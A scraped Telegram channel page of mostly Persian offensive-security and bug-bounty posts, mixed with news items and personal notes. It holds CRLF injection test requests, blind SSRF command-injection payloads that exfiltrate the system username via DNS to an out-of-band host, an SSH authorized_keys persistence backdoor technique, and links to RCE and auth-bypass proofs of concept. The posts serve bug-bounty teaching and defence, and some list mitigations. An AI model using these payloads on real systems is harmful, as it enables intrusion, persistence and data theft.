mandegar_sec | Unsorted

Telegram-канал mandegar_sec - Mandegar SEC🎩

-

offensive security☕️ گروه : @sec_gap 💣 python : t.me/persianpylearn admin : @Onthebytes💻 #bug_bounty #offsec

Subscribe to a channel

Mandegar SEC🎩

🧨 CRLF Injection

اگه دیدی میتونی با %0d%0a (CRLF) توی مسیر URL هدر جدید بسازی، احتمالا با CRLF Injection طرفی.

مثال:

https://target-site.com/%0d%0aX-Custom-Header%3Atest

Request:
GET /%0d%0aX-Custom-Header%3Atest HTTP/2
Host: target-site.com

و اگه توی Response اینو ببینی 👇
X-Custom-Header: test

یعنی ورودی بدون sanitize وارد هدر های HTTP شده.


میتونه منجر بشه به:
CRLF Injection

HTTP Response Splitting

Cache Poisoning

Set-Cookie Injection

حتی در بعضی سناریو ها XSS


📌Tips:
هر جا ورودی کاربر مستقیم تو هدر ها، لاگ‌ها یا redirectها استفاده میشه، %0d%0a رو امتحان کن.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

Читать полностью…

Mandegar SEC🎩

🪲 Recon Tip That Actually Saves Time
❌بزرگ‌ترین اشتباه تو باگ‌ بانتی؟
غرق شدن تو هزاران خط JavaScript بدون هدف.

به‌ جای خوندن همه‌ چیز، دنبال نشونه‌ ها بگرد.

از دل همین key ها میشه فهمید:

چه پارامترهایی وجود دارن ولی تو UI نیستن

چه API هایی internal هستن

چه feature flag هایی فعال/غیرفعالن

به‌جای اسکرول‌کردن کورکورانه، داده رو استخراج کن:

find . -name '*.js' | jsluice query -q '(pair key:(_)) @k' | nvim

ریکان حرفه‌ ای یعنی تمرکز روی سیگنال، نه نویز.

@mandegar_sec | Group™️

#bugbounty

Читать полностью…

Mandegar SEC🎩

چهل روز گذشت…🖤🕊

چهل روز از فقدان جانسوز عزیزانی می‌گذرد که نبودشان اندوهی عمیق و ماندگار در دل‌ها بر جای نهاده است.

این روزها، فرصتی است برای درنگی دوباره بر یاد و خاطره‌ی آنان که حضورشان سرشار از مهر، انسانیت و روشنی‌بخش دل‌ها بود.

در چهلمین روز فقدانشان، با ادای احترام به مقام و یادشان، بار دیگر مراتب همدردی و تسلیت خود را به خانواده‌های سوگوار ابراز می‌داریم.

برای آن عزیزان آرامش و رحمت ابدی، و برای بازماندگان صبر، شکیبایی و آرامش قلبی آرزومندیم.

Forty Days Have Passed…🖤🕊

Forty days have passed since the heartbreaking loss of beloved souls whose absence has left a deep and lasting sorrow in our hearts.

These days offer a moment to pause and reflect upon the memory of those whose presence was filled with kindness, humanity, and light.

On this fortieth day of their passing, we respectfully honor their memory and once again extend our heartfelt condolences to their bereaved families and loved ones.

May they be granted eternal peace and mercy, and may patience, strength, and comfort be bestowed upon those who continue to mourn their loss.

Читать полностью…

Mandegar SEC🎩

کی میتونه این پلن دانشجویی یک ساله رایگان کرسر رو بگیره
باهم استفاده کنیم☹️

https://cursor.com/students

Читать полностью…

Mandegar SEC🎩

0.0.0.0 Day: Exploiting Localhost APIs From the Browser | Oligo Security
https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser

@mandegar_sec | security researcher

Читать полностью…

Mandegar SEC🎩

🚀 OWASP Smart Contract Top 10 | نسخه 2026 منتشر شد

پروژه OWASP Smart Contract Top 10 که زیرمجموعه‌ی OWASP Smart Contract Security هست، لیستی از ۱۰ تهدید بحرانی امنیتی در قراردادهای هوشمند منتشر کرده که برای توسعه‌ دهندگان Web3 و تیم‌های امنیتی اهمیت بالایی داره. این لیست از داده‌های واقعی حملات و آسیب‌ پذیری‌ها در سال ۲۰۲۵ استخراج شده تا پیش‌ بینی کنه چه ضعف‌ هایی در ۲۰۲۶ بیشترین خطر رو دارن

📎 برای جزئیات کاملتر میتونید از سایت رسمی OWASP دیدن کنید: https://owasp.org/www-project-smart-contract-top-10/

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

#OWASP #SmartContracts #Web3 #OpenSource

Читать полностью…

Mandegar SEC🎩

Semgrep Rules: A collection of Semgrep rules to facilitate vulnerability research.👾

Github: https://github.com/0xdea/semgrep-rules

@mandegar_sec | Channel
Group🫶

Читать полностью…

Mandegar SEC🎩

جزوه کوتاه درباره اصول امنیت عملیاتی (OPSEC) در فضای مجازی

Читать полностью…

Mandegar SEC🎩

Persistence With ssh Keys

یکی از قابلیت های خود SSH این هستش به جای احراز هویت از طریق پسورد میتونیم یک کلید عمومی و خصوصی درست کنیم

ssh-keygen

و با قرار دادن کلید عمومی داخل سرور موردنظر تو مسیر ~/.ssh/authorized_keys بدون نیاز به پسورد ،مستقیم لاگین کرد .
اما همین قابلیت تو دست مهاجم میتونه خطرناک باشه
اگر مهاجم بتونه روی تارگتی که سرویس SSH فعال داشته باشه اسیب پذیری فایل اپلود پیدا کنه (البته اینکه بشه مسیر رو عوض کرد از دردسراش هست ) Public Key خودش رو اپلود کنه میتونه به راحتی از SSH تارگت استفاده کنه و یا حتی وقتی که دسترسی RCE داره و میتونه از این عمل به عنوان Persistence استفاده کنه چون با اضافه کردن Public Key حتی بعد از عوض کردن پسورد های لاگین باز هم میتونیم لاگین کنیم چون کاملا مستقل از پسورد عمل میکنه و میشه یه بکدور خوب و دائمی در نظرش گرفت.
نمونه بارزش هم CVE-2022-40684 هستش که از این تکنیک میشه براش استفاده کرد برای دور زدن احراز هویت در Fortinet .
یا حتی داخل MITRE هم بهش اشاره شده
https://attack.mitre.org/techniques/T1098/004/

Mitigations :

Public Key Authentication رو فقط وقتی
لازم داری فعال کن.

مجوزهای ~/.ssh/ رو 700 و authorized_keys رو 600 نگه دار.

تغییرات فایل‌های حساس رو با ابزارهایی مثل AIDE یا OSSEC مانیتور کن.

دسترسی SSH رو با AllowUsers، IP whitelisting یا VPN محدود کن.
➖➖➖➖➖
CHANNEL
GROUP
DISCORD

Читать полностью…

Mandegar SEC🎩

ADCS Attack Techniques Cheatsheet🫆

https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64


@mandegar_sec | channel
Group🕊

Читать полностью…

Mandegar SEC🎩

Moltbot One-click RCE PoC #Moltbot #RCE
https://github.com/ethiack/moltbot-1click-rce


@mandegar_sec | channel

Читать полностью…

Mandegar SEC🎩

تو تست IDOR فقط به enumirate با عدد ID اکتفا نکن.

یه کار مهم‌ تر اینه که همون endpoint رو با متدهای مختلف HTTP تست کنی؛ مخصوصا

PUT، PATCH و DELETE

اونم با ID کاربرهای دیگه.
خیلی وقتا دولوپر فقط برای متد اصلی (مثلا GET) چک دسترسی گذاشته و بقیه متدها از قلم افتادن
این اشتباه به‌ظاهر کوچیک، تو دنیای واقعی بارها به باگ‌ های خفن منجر شده.
اگه باگ‌ بانتی کار میکنی، این ترفند رو همیشه تو چک‌ لیستت نگه دار.


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

⚠️ کاربرای NGINX حواستون باشه!

دیروز یه CVE جدید برای NGINX منتشر شده که مربوط به SSL upstream injection .
اگه از نسخه‌های آسیب‌پذیر استفاده میکنید، حتما هرچه سریع‌ تر آپدیت کنید.

✅ نسخه‌ های امن:

v1.28.2

v1.29.5

🔐 اگه از serversideup/php استفاده میکنید، خبر خوب اینکه پچ تو آخرین ریلیز اضافه شده:

نسخه: v4.3.1
https://github.com/serversideup/docker-php/releases/tag/v4.3.1


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

✏️ یک گروه پژوهشی در حال تکمیل فرآیند ارزیابی علمی طرح «رصد فناوری‌های کلیدی و روندهای نوظهور در حوزه امنیت سایبری با تأکید بر توانمندسازی داخلی» است.

این پژوهش بر پایه تحلیل گسترده داده‌های اختراعات، مقالات علمی و گزارش‌های معتبر بین‌المللی انجام شده و اکنون در مرحله اعتبارسنجی نهایی با بهره‌گیری از دیدگاه‌های متخصصان و صاحب‌نظران حوزه قرار دارد.
لازم به ذکر است این فناوری‌ها بدون هیچ فیلتری در این پرسشنامه قرار گرفته‌اند.

برای تکمیل این مرحله، از شما دعوت می‌کنیم با اختصاص چند دقیقه از زمان خود، در پرسشنامه اعتبارسنجی پژوهش شرکت نمایید. مشارکت شما به ارتقای کیفیت و اتقان نتایج این مطالعه کمک خواهد کرد.

لینک پرسشنامه:

https://survey.porsline.ir/s/nUhSv2QA

Читать полностью…

Mandegar SEC🎩

Kubernetes API Server Paths 🤳


/api
/api/v1
/apis
/apis
/apis/admissionregistration.k8s.io
/apis/admissionregistration.k8s.io/v1beta1
/apis/apiextensions.k8s.io
/apis/apiextensions.k8s.io/v1beta1
/apis/apiregistration.k8s.io
/apis/apiregistration.k8s.io/v1
/apis/apiregistration.k8s.io/v1beta1
/apis/apps
/apis/apps/v1
/apis/apps/v1beta1
/apis/apps/v1beta2
/apis/authentication.k8s.io
/apis/authentication.k8s.io/v1
/apis/authentication.k8s.io/v1beta1
/apis/authorization.k8s.i
/apis/authorization.k8s.io/v1
/apis/authorization.k8s.io/v1beta1
/apis/autoscaling
/apis/autoscaling/v1
/apis/autoscaling/v2beta1
/apis/batch
/apis/batch/v1
/apis/batch/v1beta1
/apis/certificates.k8s.io
/apis/certificates.k8s.io/v1beta1


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

🚨 Critical Vulnerability in Jinjava
CVE-2026-25526 (CVSS 9.8)

یه ضعف خیلی جدی در Jinjava کشف شده که امنیت sandbox رو زیر سوال میبره.


به مهاجمین این امکان رو میده با سوءاستفاده از template loop ها کد جاوا اجرا کنن، حتی وقتی sandbox فعال باشه.

⚡ شدت: 9.8 / Critical
📌 توصیه فوری: آپدیت به v2.8.3

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

🎯 Initial Access هنر نفوذ اولیه

راهنمای جامع ردتیم برای به‌دست‌ آوردن دسترسی اولیه به هدف:

این مجموعه، طیف کاملی از تکنیک‌های رایج و پیشرفته را پوشش میدهد، از جمله:

توسعه پیلود (DLL Sideloading، لودرهای Shellcode، سوء استفاده از Syscall ها)

HTML Smuggling

فیشینگ پیشرفته (Quishing مبتنی بر QR Code، فیشینگ از طریق Microsoft Teams)

حملات AitM و دور زدن MFA (ابزارهایی مانند Evilginx و تکنیک Device Code Phishing)

Password Spraying

بهره‌برداری از اپلیکیشن‌های در معرض اینترنت

Vishing (مهندسی اجتماعی تلفنی)

دسترسی فیزیکی (ابزارهایی مانند Rubber Ducky و Bash Bunny)

حملات زنجیره تأمین (Supply Chain) همراه با مطالعات موردی واقعی از گروه‌های APT


در واقع Initial Access نقطه آغاز هر عملیات موفق است جایی که ترکیب تکنیک، خلاقیت و شناخت رفتار انسانی، مسیر نفوذ را هموار میکند.
https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in/

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->🖤🕊

@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

📌 ابلاغ برنامه جذب و نگهداشت نیروی متخصص در حوزه فناوری اطلاعات و امنیت سایبری

بر اساس مصوبه ستاد توسعه علوم و فناوری‌های دانش‌بنیان و ابلاغ سازمان اداری و استخدامی کشور، برنامه‌ای با هدف جذب و نگهداشت نیروی انسانی متخصص در حوزه فناوری اطلاعات و امنیت سایبری تصویب شد.

در چارچوب این مصوبه، امکان افزایش سقف حقوق و مزایا برای مشاغل تخصصی این حوزه از جمله:

▪️ مدیر فناوری اطلاعات
▪️ مهندس امنیت اطلاعات
▪️ مهندس شبکه و زیرساخت
▪️ متخصص علم داده
▪️ طراح و توسعه‌دهنده نرم‌افزار
و سایر عناوین مرتبط

بر اساس جدول اعلامی فراهم شده است.

این اقدام در راستای تقویت توانمندی‌های تخصصی کشور در حوزه‌های راهبردی فناوری اطلاعات و امنیت سایبری ارزیابی می‌شود.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

#فناوری_اطلاعات #امنیت_سایبری #استخدام #IT #CyberSecurity

Читать полностью…

Mandegar SEC🎩

این موز چیه گیر دادین بش..

Читать полностью…

Mandegar SEC🎩

❌OAuth State Parameter Misbinding → Account Takeover


POC →
1. هنگام بررسی فلو OAuth، مشخص شد state تولید میشه اما در callback به session کاربر بایند نشده.

2. مهاجم یک لاگین OAuth روی اکانت خودش شروع می‌کنه و پاسخ authorization رو ذخیره می‌کنه.

3. قربانی مجبور میشه فلو OAuth رو با state کنترل‌شده توسط مهاجم کامل کنه.

4. اپلیکیشن mismatch بودن state رو تشخیص نمی‌ده و درخواست رو قبول می‌کنه.

5. سشن قربانی به authorization مهاجم لینک میشه.

6.در نتیجه Account Takeover کامل از طریق OAuth Misbinding رخ میده.

🎯 TIPS :
- امنیت OAuth به‌شدت وابسته به اعتبارسنجی دقیق state هست.

- state باید در سمت سرور و به session همون کاربر بایند بشه.

- ضعف‌ هایه لاجیک در پیاده‌سازی OAuth، این روزها تو اپ‌های مدرن زیاد دیده میشه.


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group™️

#infosec #hacking #hacker #cybersecurity #bugbounty #bugbountytips

Читать полностью…

Mandegar SEC🎩

اگه به یه Blind SSRF رسیدی، فقط به همون اکتفا نکن.

یه قدم جلوتر برو و چک کن ببین پشتش OS Command Injection خوابیده یا نه.

خیلی وقتا SSRF ورودی رو میبره داخل یه context سیستمی.
اگه اون ورودی داخل shell اجرا بشه، می‌تونی خروجی دستور رو از طریق DNS بیرون بکشی (OOB).

برای گرفتن تعامل خارجی (DNS / HTTP) از Interactsh استفاده کن:
http://app.interactsh.com


TEST KEYS :🍸

اگه این payload ها باعث بشن یه DNS request با مقدار واقعی سیستم سمت سرور برگرده، یعنی قضیه جدیه 👀

https://`whoami`.your-id.oast.fun

https://$(whoami).your-id.oast.fun

https://${USER}.your-id.oast.fun

اگر به‌جای your-id مقدار واقعی یوزر سیستم رو تو لاگ Interactsh دیدی، یعنی ورودی داره داخل shell تفسیر میشه.


Blind SSRF همیشه فقط “یه SSRF ساده” نیست.
گاهی همون نقطه‌ ایه که اگه درست نگاهش کنی، می‌تونه به RCE ختم بشه.


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group🕊

#BugBounty #BugBountyTips #Hacking

Читать полностью…

Mandegar SEC🎩

🚨 یه بازیگر تهدید جدید به اسم Amaranth-Dragon وارد صحنه شده که احتمال میدن به نهادهای اطلاعاتی چین مرتبط باشه و ظاهراً سراغ اهداف حساس و استراتژیک رفته.

طبق گزارش Check Point Research، این کمپین جاسوسی سایبری از آسیب‌پذیری
CVE-2025-8088 در WinRAR برای نفوذ استفاده می‌کنه.

🔍 روند حمله چطوریه؟


1️⃣ شروع کار با یه ایمیل فیشینگ که داخلش یه فایل RAR آلوده قرار داره.
2️⃣ با سوءاستفاده از باگ WinRAR، یه اسکریپت مخرب بدون اینکه کاربر متوجه بشه داخل پوشه Startup سیستم استخراج میشه.
3️⃣ سیستم آلوده به سرور فرماندهی و کنترل (C2) وصل میشه تا payload اصلی و کلید رمزگشایی رو دریافت کنه.

در نهایت مهاجم میتونه کنترل زیرساخت هدف رو به‌ دست بگیره؛ ابزار هایی مثل Havoc C2 یا TGAmaranth RAT هم تو این عملیات دیده شدن.

🌍 یه نکته جالب اینه که سرور C2 فقط در صورتی پاسخ میده که IP قربانی متعلق به یه منطقه جغرافیایی مشخص باشه ،یعنی کمپین کاملاً هدفمند طراحی شده.


این ماجرا دوباره نشون میده که حتی ابزارهای رایج مثل WinRAR، اگه به‌موقع آپدیت نشن، می‌تونن تبدیل به نقطه ورود حملات پیشرفته بشن.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group🍸

Читать полностью…

Mandegar SEC🎩

سلام رفقا
اگ انتقاد یا پیشنهادی دارین نسبت به چنل خوشحال میشم بهم بگید
@Onthebytes
@msecadmins_bot

Читать полностью…

Mandegar SEC🎩

🔥 Credential Dumping with NetExec | Cheatsheet 2026

در این ویدیو، ابزار NetExec (نسخه توسعه‌ یافته CrackMapExec) به‌صورت عملی معرفی و بررسی شده است.
تمرکز اصلی آموزش بر استفاده از این ابزار در سناریوهای شبکه و محیط‌های Active Directory میباشد.

در این محتوا مشاهده خواهید کرد:

➖ نحوه کار با NetExec در عملیات‌های شبکه

➖ اجرای دستورات کاربردی برای تحلیل و شناسایی

➖ مفاهیم مرتبط با Credential Dumping در سیستم‌ های ویندوزی

➖ کاربرد عملی دستورات شبکه در مدیریت و ارزیابی امنیت سیستم‌ها


این آموزش برای افرادی که در حوزه‌های Red Team، تست نفوذ داخلی، یا امنیت Active Directory فعالیت می‌کنند، می‌تواند مفید و کاربردی باشد.

🎥 لینک ویدیو:
https://youtu.be/h46f_0pOeLo?si=i9yOqv59b736O4Wj


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group🖤

Читать полностью…

Mandegar SEC🎩

🚀Extract IPs from Shodan HTML in Seconds!

Sick of digging through HTML? Let grep do the work! 💻

grep -oP '(?<=<strong>).*?(?=</strong>)' ip.html > ips

1️⃣ Save Shodan page source as HTML
2️⃣ Run this command
3️⃣ BOOM 💥 — All IPs extracted to ips!

#Shodan

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻

@mandegar_sec | channel
Group🧣

Читать полностью…

Mandegar SEC🎩

🚨 CVE-2025-64328 | امتیاز 8.6 (High)

FreePBX
یه پنل مدیریتی تحت وب برای راه‌اندازی و مدیریت سیستم‌های تلفنی مبتنی بر Asterisk (VoIP) هست.

Affected versions :
> = 17.0.2.36 && < 17.0.3
Patched versions : 17.0.3


به تازگی یه آسیب‌پذیری جدی توی پنل مدیریت FreePBX پیدا شده که منجر به Authenticated Command Injection میشه.
داخل ماژول Endpoint Manager و بخش filestore، تابع
testconnection →check_ssh_connect()

ورودی رو درست هندل نمیکنه و مهاجم لاگین‌ کرده میتونه کامند دلخواه اجرا کنه.
و منجر به اجرای دستورات روی سیستم و گرفتن دسترسی به‌عنوان کاربر asterisk (که توی محیط‌های VoIP خیلی حساسه).

🛡MITIGATION :
➖ ماژول filestore رو به آخرین نسخه آپدیت کنید.
➖ مطمئن بشید فقط کاربران مجاز به پنل مدیریت FreePBX دسترسی دارن.
➖ دسترسی به پنل ادمین (ACP) رو از شبکه‌های غیرقابل اعتماد ببندید
به عنوان مثال با استفاده از ماژول فایروال FreePBX.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group™️

Читать полностью…

Mandegar SEC🎩

تلگرام سر کیسرو شل کرد بلاخره

Читать полностью…

Mandegar SEC🎩

سلام عزیزان
این پرسشنامه رو یکی از مخاطبین زحمت کشیده و آماده کرده
خوشحال میشم شرکت کنید 🍸

Читать полностью…

Mandegar SEC🎩

بیدارین یه پست بزارم؟

Читать полностью…

Mandegar SEC🎩

CVE-2025-40554 – SolarWinds Web Help Desk
*
Auth Bypass PoC

Читать полностью…
Subscribe to a channel